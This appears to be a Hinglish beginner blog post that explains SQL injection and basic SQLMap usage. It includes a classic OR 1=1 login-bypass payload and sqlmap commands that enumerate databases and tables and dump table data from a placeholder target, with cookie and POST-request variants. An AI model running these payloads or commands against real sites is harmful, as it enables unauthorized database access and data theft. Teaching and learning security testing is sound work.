Posted in

SQLMap Basics – SQL Injection Attack Ka Complete Guide (Beginner to Advanced)

by cyber-teck0

Introduction

Cyber Security में SQL Injection एक बहुत ही dangerous vulnerability है। Hackers इसी technique का use करके database से sensitive data निकाल सकते हैं।

इस ब्लॉग में हम समझेंगे:

  • Database क्या होता है
  • SQL Injection कैसे काम करता है
  • और SQLMap का use करके कैसे vulnerabilities detect करते हैं

📊 Database क्या होता है?

Database एक structured system होता है जहाँ data store, modify और retrieve किया जाता है।

👉 Example:
जब आप किसी website पर login करते हो:

  • Username और password database में stored होता है
  • Website SQL query के through check करती है

🔗 Website Database से कैसे connect होती है?

Websites SQL queries के through database से बात करती हैं।

👉 Example Query:

SELECT * FROM users WHERE username = ‘John’ AND password = ‘123456’;

अगर username और password match हो जाए → login success
नहीं तो → login fail

⚠️ SQL Injection क्या है?

जब website user input को properly validate नहीं करती, तब hacker malicious SQL code inject कर सकता है

👉 Example Attack:

Password: abc’ OR 1=1;– –

इससे query बनती है:

SELECT * FROM users WHERE username=’John’ AND password=’abc’ OR 1=1;

👉 1=1 हमेशा TRUE होता है
👉 Result: Hacker बिना password के login कर जाता है 😱

💥 SQL Injection क्यों dangerous है?

  • Database data leak हो सकता है
  • Admin access मिल सकता है
  • Website hack हो सकती है

⚙️ SQLMap क्या है?

SQLMap एक powerful automation tool है जो:

✅ SQL Injection detect करता है
✅ Database information निकालता है
✅ Tables और data dump करता है

📌 यह tool Linux में आसानी से use होता है

🚀 SQLMap Basic Commands

🔍 1. Vulnerability Scan

sqlmap -u “http://target.com/page?id=1”

👉 यह check करेगा कि URL vulnerable है या नहीं

🧠 2. Databases निकालना

sqlmap -u “http://target.com/page?id=1” –dbs

👉 Available databases list करेगा

📂 3. Tables निकालना

sqlmap -u “http://target.com/page?id=1” -D database_name –tables

📊 4. Data Dump करना

sqlmap -u “http://target.com/page?id=1” -D database_name -T table_name –dump

👉 Table के अंदर का पूरा data निकाल देगा

🍪 Cookie-based Testing

अगर website login require करती है तो:

sqlmap -u “URL” –cookie=”SESSIONID=xyz”

👉 इससे authenticated testing possible होती है

🧪 GET vs POST Injection

🔹 GET Request

URL में parameters दिखते हैं

http://site.com/page?id=1

🔹 POST Request

Data body में होता है → intercept करना पड़ता है

sqlmap -r request.txt

🔥 SQL Injection Types

SQLMap different types detect करता है:

  • Boolean-based
  • Error-based
  • Time-based
  • UNION-based

👉 ये सभी techniques data निकालने के अलग-अलग तरीके हैं

Leave a Reply

Your email address will not be published. Required fields are marked *